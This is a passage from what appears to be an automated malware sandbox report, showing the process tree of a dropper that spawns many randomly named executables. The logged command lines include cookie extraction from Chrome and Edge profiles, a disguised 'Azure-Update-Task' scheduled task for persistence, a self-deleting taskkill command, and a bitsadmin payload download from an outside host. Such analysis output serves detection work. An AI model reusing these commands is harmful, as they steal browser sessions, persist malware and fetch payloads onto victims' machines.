6ADB8AA23FE92E5441F1156CC3FB949E.exe RbEqteJ5drtD1PHvqibD7reP.exe PID 3164 wrote to memory of 4324 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe PID 3164 wrote to memory of 4324 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe PID 3164 wrote to memory of 4324 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe PID 3164 wrote to memory of 4292 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe neVBHdSUrlSjAeQjSg3KZDBw.exe PID 3164 wrote to memory of 4292 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe neVBHdSUrlSjAeQjSg3KZDBw.exe PID 3164 wrote to memory of 4292 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe neVBHdSUrlSjAeQjSg3KZDBw.exe PID 3164 wrote to memory of 4300 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe 5z38j0u0A1gH6MVqMIsMFzEz.exe PID 3164 wrote to memory of 4300 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe 5z38j0u0A1gH6MVqMIsMFzEz.exe PID 3164 wrote to memory of 4300 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe 5z38j0u0A1gH6MVqMIsMFzEz.exe PID 3164 wrote to memory of 4316 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe SoICTNRTJ2YvPMH8qYwUTKKW.exe PID 3164 wrote to memory of 4316 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe SoICTNRTJ2YvPMH8qYwUTKKW.exe PID 3164 wrote to memory of 4316 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe SoICTNRTJ2YvPMH8qYwUTKKW.exe PID 3164 wrote to memory of 4284 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe eGJclJQJWVBOFygCVzpPNsAl.exe PID 3164 wrote to memory of 4284 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe eGJclJQJWVBOFygCVzpPNsAl.exe PID 3164 wrote to memory of 4284 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe eGJclJQJWVBOFygCVzpPNsAl.exe PID 3164 wrote to memory of 4336 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe XnOoxUckggjX5foWJMU2gw8A.exe PID 3164 wrote to memory of 4336 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe XnOoxUckggjX5foWJMU2gw8A.exe PID 3164 wrote to memory of 4308 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe ehAkZbkYLsgDGk486mcpJWLA.exe PID 3164 wrote to memory of 4308 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe ehAkZbkYLsgDGk486mcpJWLA.exe PID 3164 wrote to memory of 4308 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe ehAkZbkYLsgDGk486mcpJWLA.exe PID 3164 wrote to memory of 4364 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe PXBzV_zEw_pgOR1zKtBuDE1n.exe PID 3164 wrote to memory of 4364 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe PXBzV_zEw_pgOR1zKtBuDE1n.exe PID 3164 wrote to memory of 4364 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe PXBzV_zEw_pgOR1zKtBuDE1n.exe PID 3164 wrote to memory of 4380 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe X6wMz1CRIeJyms6WRZPsFM_R.exe PID 3164 wrote to memory of 4380 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe X6wMz1CRIeJyms6WRZPsFM_R.exe PID 3164 wrote to memory of 4380 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe X6wMz1CRIeJyms6WRZPsFM_R.exe PID 3164 wrote to memory of 4252 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hozif_R0m00yWfOVjtp_PDHQ.exe PID 3164 wrote to memory of 4252 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hozif_R0m00yWfOVjtp_PDHQ.exe PID 3164 wrote to memory of 4252 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hozif_R0m00yWfOVjtp_PDHQ.exe PID 3164 wrote to memory of 4372 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe x5iNqYgETCMGFiSGZnpQGxcq.exe PID 3164 wrote to memory of 4372 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe x5iNqYgETCMGFiSGZnpQGxcq.exe PID 3164 wrote to memory of 4372 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe x5iNqYgETCMGFiSGZnpQGxcq.exe PID 3164 wrote to memory of 4344 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe uLClj5kj3AoL6JIVVR4sepVv.exe PID 3164 wrote to memory of 4344 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe uLClj5kj3AoL6JIVVR4sepVv.exe PID 3164 wrote to memory of 4344 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe uLClj5kj3AoL6JIVVR4sepVv.exe PID 3164 wrote to memory of 4420 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe cBtqBNqwXdb3zhTMvm1NJw2V.exe PID 3164 wrote to memory of 4420 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe cBtqBNqwXdb3zhTMvm1NJw2V.exe PID 3164 wrote to memory of 4520 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe YLyfLdtG4aeto7JDq0eATD13.exe PID 3164 wrote to memory of 4520 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe YLyfLdtG4aeto7JDq0eATD13.exe PID 3164 wrote to memory of 4580 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe UP4ViI_hwH9jVOJQS4l4acdd.exe PID 3164 wrote to memory of 4580 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe UP4ViI_hwH9jVOJQS4l4acdd.exe PID 3164 wrote to memory of 4580 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe UP4ViI_hwH9jVOJQS4l4acdd.exe PID 4144 wrote to memory of 5112 4144 xlzHeuwelgGNWi4FQtKYtaLs.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 4144 wrote to memory of 5112 4144 xlzHeuwelgGNWi4FQtKYtaLs.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 4144 wrote to memory of 5112 4144 xlzHeuwelgGNWi4FQtKYtaLs.exe xlzHeuwelgGNWi4FQtKYtaLs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe"C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\Documents\hpG_QsrS8jyUhxZBwiU7DK_t.exe"C:\Users\Admin\Documents\hpG_QsrS8jyUhxZBwiU7DK_t.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4192 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3976
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:4628
-
-
-
-
C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"2⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4476
-
-
C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"3⤵PID:1612
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:4932
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵PID:5932
-
-
-
-
-
C:\Users\Admin\Documents\b0Jm51vLbWPyCkE6vTfUOh8q.exe"C:\Users\Admin\Documents\b0Jm51vLbWPyCkE6vTfUOh8q.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 7603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 8123⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 8483⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 9563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 10523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 14283⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 14683⤵
- Program crash
PID:5748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 15123⤵
- Program crash
PID:2780
-
-
-
C:\Users\Admin\Documents\UxSWhTy41TFRKucJet4YNiEK.exe"C:\Users\Admin\Documents\UxSWhTy41TFRKucJet4YNiEK.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Users\Admin\AppData\Roaming\8732185.exe"C:\Users\Admin\AppData\Roaming\8732185.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Users\Admin\AppData\Roaming\3549794.exe"C:\Users\Admin\AppData\Roaming\3549794.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4844 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4688
-
-
-
C:\Users\Admin\AppData\Roaming\3270862.exe"C:\Users\Admin\AppData\Roaming\3270862.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Users\Admin\AppData\Roaming\2101679.exe"C:\Users\Admin\AppData\Roaming\2101679.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5172
-
-
-
C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5112
-
-
-
C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V.exe"C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4420 -
C:\Users\Admin\AppData\Roaming\4274478.exe"C:\Users\Admin\AppData\Roaming\4274478.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5304
-
-
C:\Users\Admin\AppData\Roaming\4806551.exe"C:\Users\Admin\AppData\Roaming\4806551.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
-
-
C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe"C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe"C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe"2⤵
- Executes dropped EXE
PID:4372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 11523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "x5iNqYgETCMGFiSGZnpQGxcq.exe" /f & erase "C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe" & exit3⤵PID:6036
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "x5iNqYgETCMGFiSGZnpQGxcq.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
-
-
C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"2⤵
- Executes dropped EXE
PID:4364 -
C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
-
C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe"C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Users\Admin\Documents\XnOoxUckggjX5foWJMU2gw8A.exe"C:\Users\Admin\Documents\XnOoxUckggjX5foWJMU2gw8A.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Users\Admin\Documents\Y6eV1ERSHcBk8XWyMyACCKSW.exe"C:\Users\Admin\Documents\Y6eV1ERSHcBk8XWyMyACCKSW.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 7683⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 7923⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 8683⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 8123⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 9563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 9843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 10603⤵
- Program crash
PID:5560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 13883⤵
- Program crash
PID:5920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 15283⤵
- Program crash
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 13363⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 17323⤵
- Program crash
PID:5812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 17283⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5404
-
-
-
C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe"C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4316 -
C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe"{path}"3⤵
- Executes dropped EXE
PID:5888 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:6080
-
-
-
-
C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe"C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4308 -
C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exeC:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe3⤵
- Executes dropped EXE
PID:4948
-
-
-
C:\Users\Admin\Documents\5z38j0u0A1gH6MVqMIsMFzEz.exe"C:\Users\Admin\Documents\5z38j0u0A1gH6MVqMIsMFzEz.exe"2⤵PID:4300
-
-
C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe"C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe"2⤵
- Executes dropped EXE
PID:4292 -
C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exeC:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
-
C:\Users\Admin\Documents\eGJclJQJWVBOFygCVzpPNsAl.exe"C:\Users\Admin\Documents\eGJclJQJWVBOFygCVzpPNsAl.exe"2⤵
- Executes dropped EXE
PID:4284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6643⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6803⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 6363⤵
- Program crash
PID:4532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 8523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 12483⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 12403⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Users\Admin\Documents\AfGceh7C3AiICU0VpXEapNYr.exe"C:\Users\Admin\Documents\AfGceh7C3AiICU0VpXEapNYr.exe"2⤵
- Executes dropped EXE
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:4720
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:5464
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4268 -s 15523⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5532
-
-
-
C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe"C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4260 -
C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exeC:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
-
C:\Users\Admin\Documents\hozif_R0m00yWfOVjtp_PDHQ.exe"C:\Users\Admin\Documents\hozif_R0m00yWfOVjtp_PDHQ.exe"2⤵
- Executes dropped EXE
PID:4252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 7363⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 7523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8883⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 7163⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8323⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe"C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:4248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:5272
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:4320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:6000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:4904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵PID:4860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"3⤵
- Checks for any installed AV software in registry
- Suspicious use of SetThreadContext
PID:4292
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z3⤵
- Download via BitsAdmin
PID:5896
-
-
-
C:\Users\Admin\Documents\YLyfLdtG4aeto7JDq0eATD13.exe"C:\Users\Admin\Documents\YLyfLdtG4aeto7JDq0eATD13.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4520 -
C:\Users\Admin\AppData\Roaming\4963167.exe"C:\Users\Admin\AppData\Roaming\4963167.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Users\Admin\AppData\Roaming\2066937.exe"C:\Users\Admin\AppData\Roaming\2066937.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
-
C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe"C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe"2⤵
